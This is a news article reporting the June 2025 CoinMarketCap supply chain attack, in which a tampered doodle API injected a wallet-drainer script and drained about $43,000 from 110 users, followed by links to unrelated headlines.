News
CoinMarketCap Supply Chain Attack Leaves Crypto Users Reeling After $43,000 Wallet Drain
<p data-start="264" data-end="392">A malicious script hidden in a homepage image triggered a wallet-draining popup that stole thousands from unsuspecting visitors.</p>
<p data-start="399" data-end="710">On the evening of June 20, 2025, visitors to CoinMarketCap weren’t expecting anything unusual. It looked like a typical day on the world’s most visited cryptocurrency pricing site. But what appeared to be a harmless homepage doodle ended up being the digital Trojan horse that siphoned crypto from user wallets.</p>
<p data-start="712" data-end="905">Within hours, a wave of complaints and concerns started trickling through social media and crypto forums. Popups asking users to connect their Web3 wallets? On CoinMarketCap? Something was off.</p>
<h2 data-start="907" data-end="941">A Wallet Popup No One Asked For</h2>
<p data-start="943" data-end="1042">Things started to go sideways when users began encountering strange Web3 wallet connection prompts.</p>
<p data-start="1044" data-end="1170">Most users thought it was a new feature or maybe an update. Instead, the moment they clicked &#8220;Connect,&#8221; their crypto was gone.</p>
<p data-start="1172" data-end="1187">Just like that.</p>
<p data-start="1189" data-end="1355">In a statement posted on X, CoinMarketCap confirmed that threat actors had slipped malicious JavaScript into their homepage through a seemingly innocent doodle image.</p>
<p data-start="1189" data-end="1355"><a href="https://www.theibulletin.com/wp-content/uploads/2025/06/coinmarketcap-website-homepage-screenshot.jpg"><img class="aligncenter size-full wp-image-57732" src="https://www.theibulletin.com/wp-content/uploads/2025/06/coinmarketcap-website-homepage-screenshot.jpg" alt="coinmarketcap website homepage screenshot" width="1101" height="818" /></a></p>
<h2 data-start="1357" data-end="1401">How a Doodle Image Became the Smoking Gun</h2>
<p data-start="1403" data-end="1441">So how did an image become a backdoor?</p>
<p data-start="1443" data-end="1631">Well, it wasn’t the image itself. It was the JSON payload linked to it. According to cybersecurity firm c/side, attackers had tampered with the API CoinMarketCap used to serve that doodle.</p>
<p data-start="1633" data-end="1771">Once that JSON was loaded, it quietly inserted a script tag referencing static.cdnkit[.]io—an external server controlled by attackers.</p>
<p data-start="1773" data-end="1807">And that’s where the damage began.</p>
<ul data-start="1809" data-end="2024">
<li data-start="1809" data-end="1847">
<p data-start="1811" data-end="1847">The script ran on the user’s browser</p>
</li>
<li data-start="1848" data-end="1917">
<p data-start="1850" data-end="1917">A fake Web3 wallet popup appeared using real CoinMarketCap branding</p>
</li>
<li data-start="1918" data-end="1978">
<p data-start="1920" data-end="1978">Unsuspecting users clicked “connect,” thinking it was safe</p>
</li>
<li data-start="1979" data-end="2024">
<p data-start="1981" data-end="2024">Their wallet contents were drained silently</p>
</li>
</ul>
<p data-start="2026" data-end="2212">This wasn’t a direct breach of CoinMarketCap’s servers. It was something trickier: a supply chain attack. One that worked by compromising a third-party component CoinMarketCap relied on.</p>
<h2 data-start="2214" data-end="2272">Supply Chain Attacks: Silent, Slippery, and Devastating</h2>
<p data-start="2274" data-end="2393">Supply chain attacks are nasty because they don’t go after the big fish directly. Instead, they poison the fish’s food.</p>
<p data-start="2395" data-end="2521">That’s basically what happened here. CMC trusted an external source to display a fun little graphic. That trust was exploited.</p>
<p data-start="2523" data-end="2642">In their analysis, c/side wrote: “Such attacks are hard to detect because they exploit trusted elements of a platform.”</p>
<p data-start="2644" data-end="2813">They’re not wrong. From SolarWinds to 3CX, supply chain breaches have made headlines for exactly this reason—they sneak in through the back door everyone forgot to lock.</p>
<h2 data-start="2815" data-end="2850">A Glimpse Into the Drainer Panel</h2>
<p data-start="2852" data-end="2893">The attackers weren’t exactly shy either.</p>
<p data-start="2895" data-end="3074">More technical details started emerging after a threat actor named Rey posted a screenshot of the drainer control panel on Telegram. The panel confirmed some disturbing stats:</p>
<ul data-start="3076" data-end="3169">
<li data-start="3076" data-end="3103">
<p data-start="3078" data-end="3103">Total stolen: $43,266</p>
</li>
<li data-start="3104" data-end="3128">
<p data-start="3106" data-end="3128">Total victims: 110</p>
</li>
<li data-start="3129" data-end="3169">
<p data-start="3131" data-end="3169">Language used by attackers: French</p>
</li>
</ul>
<p data-start="3171" data-end="3225">Here&#8217;s a snapshot of what the attackers were tracking:</p>
<div class="_tableContainer_16hzy_1">
<div class="_tableWrapper_16hzy_14 group flex w-fit flex-col-reverse" tabindex="-1">
<table class="w-fit min-w-(--thread-content-width)" data-start="3227" data-end="3549">
<thead data-start="3227" data-end="3268">
<tr data-start="3227" data-end="3268">
<th data-start="3227" data-end="3253" data-col-size="sm">Metric</th>
<th data-start="3253" data-end="3268" data-col-size="sm">Value</th>
</tr>
</thead>
<tbody data-start="3311" data-end="3549">
<tr data-start="3311" data-end="3352">
<td data-start="3311" data-end="3337" data-col-size="sm">Total Wallets Affected</td>
<td data-start="3337" data-end="3352" data-col-size="sm">110</td>
</tr>
<tr data-start="3353" data-end="3394">
<td data-start="3353" data-end="3379" data-col-size="sm">Total Funds Drained</td>
<td data-start="3379" data-end="3394" data-col-size="sm">$43,266</td>
</tr>
<tr data-start="3395" data-end="3436">
<td data-start="3395" data-end="3421" data-col-size="sm">Channel Language</td>
<td data-start="3421" data-end="3436" data-col-size="sm">French</td>
</tr>
<tr data-start="3437" data-end="3485">
<td data-start="3437" data-end="3463" data-col-size="sm">Host Site</td>
<td data-start="3463" data-end="3485" data-col-size="sm">static.cdnkit[.]io</td>
</tr>
<tr data-start="3486" data-end="3549">
<td data-start="3486" data-end="3512" data-col-size="sm">Popup Spoof</td>
<td data-start="3512" data-end="3549" data-col-size="sm">CoinMarketCap Web3 Wallet Connect</td>
</tr>
</tbody>
</table>
<div class="sticky end-(--thread-content-margin) h-0 self-end select-none">
<div class="absolute end-0 flex items-end"></div>
</div>
</div>
</div>
<p data-start="3551" data-end="3731">While $43K might not sound like a fortune in crypto terms, that’s not the real point. The point is how it was done—stealthy, smart, and practically invisible until it was too late.</p>
<h2 data-start="3733" data-end="3787">The Bigger Picture: Wallet Drainers Are on the Rise</h2>
<p data-start="3789" data-end="3825">Unfortunately, this isn’t a one-off.</p>
<p data-start="3827" data-end="4067">Wallet drainers have been getting more creative by the month. Gone are the days of old-school phishing emails. Now, you’ll find them embedded in Twitter ads, disguised as browser extensions, or hiding in cloned versions of popular websites.</p>
<p data-start="4069" data-end="4231">By some estimates, wallet drainers alone siphoned nearly $500 million in 2024. That’s half a billion gone in less than a year, spread across 300,000+ victims.</p>
<p data-start="4233" data-end="4247">Scary numbers.</p>
<p data-start="4249" data-end="4376">Mozilla&#8217;s even rolled out new measures to spot these scripts in Firefox add-ons. That tells you how real the threat has become.</p>
<h2 data-start="4378" data-end="4437">CoinMarketCap Responds, Users Left Picking Up the Pieces</h2>
<p data-start="4439" data-end="4608">CoinMarketCap says the hole is patched. Their post on X was quick to reassure users: “We acted immediately… identified the root cause… CoinMarketCap is safe and secure.”</p>
<p data-start="4610" data-end="4655">But for the 110 victims, it’s little comfort.</p>
<p data-start="4657" data-end="4746">There’s no customer support line for stolen Ethereum. No chargeback button for lost NFTs.</p>
<p data-start="4748" data-end="4812">In crypto, self-custody means self-responsibility—and self-risk.</p>
<p data-start="4814" data-end="4952">One user wrote on Reddit, “I only had $300 in there, but it still hurts. I’ve been checking that site for years without a second thought.”</p>
<p data-start="4954" data-end="4995">That’s exactly what made the attack work.</p>

CoinMarketCap Supply Chain Attack Leaves Crypto Users Reeling After $43,000 Wallet Drain
Solana Slips as Bitcoin Soars: Can the High-Speed Crypto Still Catch Up?
Gordon Ramsay Fainted at Son’s Birth While Ed Sheeran Played in the Background
As AI hype grabs headlines, these two tech titans are doing more than talking — they’re cashing in
What Does Guashen Mean? Understanding the Origins, Usage, and Impact of This Chinese Term
The Last of Us Season 3: Clarity, Chaos, and Characters We Thought Were Gone
Einstein and the Block Universe: Is Your Future Already Set?
XRP Eyes $3 as Crypto Markets See Whiplash Recovery and Bitcoin Roars Past $111K
Claude 4 Cuts Coding Errors by 25%, Gets Faster, Says Vibe Startup Lovable
Bitcoin vs Quantum Computing: Will BlackRock’s Warning Come True?
-
News4 months agoTaiwanese Companies Targeted in Phishing Campaign Using Winos 4.0 Malware
-
News3 months agoJustin Baldoni Hits Back at Ryan Reynolds, Calling Him a “Co-Conspirator” in Blake Lively Legal Battle
-
News4 months agoApple Shuts Down ADP for UK iCloud Users Amid Government Backdoor Demands
